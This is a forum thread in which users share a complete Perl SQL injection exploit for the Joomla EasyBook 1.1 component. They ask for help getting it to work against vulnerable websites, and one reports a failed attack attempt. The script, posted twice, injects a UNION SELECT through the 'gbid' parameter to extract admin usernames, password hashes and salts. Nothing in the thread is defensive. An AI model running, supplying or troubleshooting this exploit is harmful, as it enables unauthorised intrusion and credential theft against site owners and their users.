Government Security
Network Security Resources

Jump to content

Photo

Joomla Component EasyBook 1.1 SQL Injection Exploit (Question)


  • Please log in to reply
1 reply to this topic

#1 Mux99

Mux99

    Private First Class

  • Members
  • 59 posts

Posted 27 July 2008 - 10:48 AM

So this is an exploit for Joomla Component EasyBook 1.1 but i really donīt know what this parameter is: "&md: 0f8ab366793a0d1da85c6f5a8d4fb576#" ! Did you know where i can find this hash on vulnerable websites? And for waht do i need ist. i dont think its an session id or anything else... without that the whole exploit is useless...

Thx for helping me ;)

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:							 #
# Host: xxx.lu					 #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--													  --+-\n";
print "-+--			Author: ZAMUT							 --+-\n";
print "-+--			Vuln: gbid=							   --+-\n";
print "-+--			Homepage: http://antichat.ru			  --+-\n";
print "-+--			Dork: com_easybook						--+-\n\n";

print "Host:";
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
			   "Host: www.$host\n".
			   "Content-Type: application/x-www-form-urlencoded\n".
			   "Content-Length: 214\n\n".
			   "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
	 $s = <$socket>;
	 if($s=~/:::(.+):::/){
		   $lhs = $1;
		   ($l,$h,$s)=split(':',$lhs);
		   print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
		   close $socket; 
		   exit; }
  }
  die ("Exploit failed!");

# milw0rm.com [2008-06-04]
http://www.milw0rm.com/exploits/5740

#2 alexbtp

alexbtp

    Private

  • Members
  • 1 posts

Posted 08 May 2009 - 09:26 AM

So this is an exploit for Joomla Component EasyBook 1.1 but i really donīt know what this parameter is: "&md: 0f8ab366793a0d1da85c6f5a8d4fb576#" ! Did you know where i can find this hash on vulnerable websites? And for waht do i need ist. i dont think its an session id or anything else... without that the whole exploit is useless...

Thx for helping me ;)

#!/usr/bin/perl
 use IO::Socket;
 use strict;
 
 ##### INFO##############################
 # Example:							 #
 # Host: xxx.lu					 #
 # &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
 ########################################
 
 
 print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
 print "-+--													  --+-\n";
 print "-+--			Author: ZAMUT							 --+-\n";
 print "-+--			Vuln: gbid=							   --+-\n";
 print "-+--			Homepage: http://antichat.ru			  --+-\n";
 print "-+--			Dork: com_easybook						--+-\n\n";
 
 print "Host:";
 chomp(my $host=<STDIN>);
 print "&md=";
 chomp(my $md=<STDIN>);
 
 my ($socket,$lhs,$l,$h,$s);
 $socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
 print $socket  "POST /index.php HTTP/1.0\n".
				"Host: www.$host\n".
				"Content-Type: application/x-www-form-urlencoded\n".
				"Content-Length: 214\n\n".
				"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
   while(<$socket>)
   {
	  $s = <$socket>;
	  if($s=~/:::(.+):::/){
			$lhs = $1;
			($l,$h,$s)=split(':',$lhs);
			print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
			close $socket; 
			exit; }
   }
   die ("Exploit failed!");
 
 # milw0rm.com [2008-06-04]
http://www.milw0rm.com/exploits/5740

Oh thanks
But i can't exploit
Attack report

Can't connecting! at file.pl line 25

or

Exploit failed!

I can't see &gbid




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users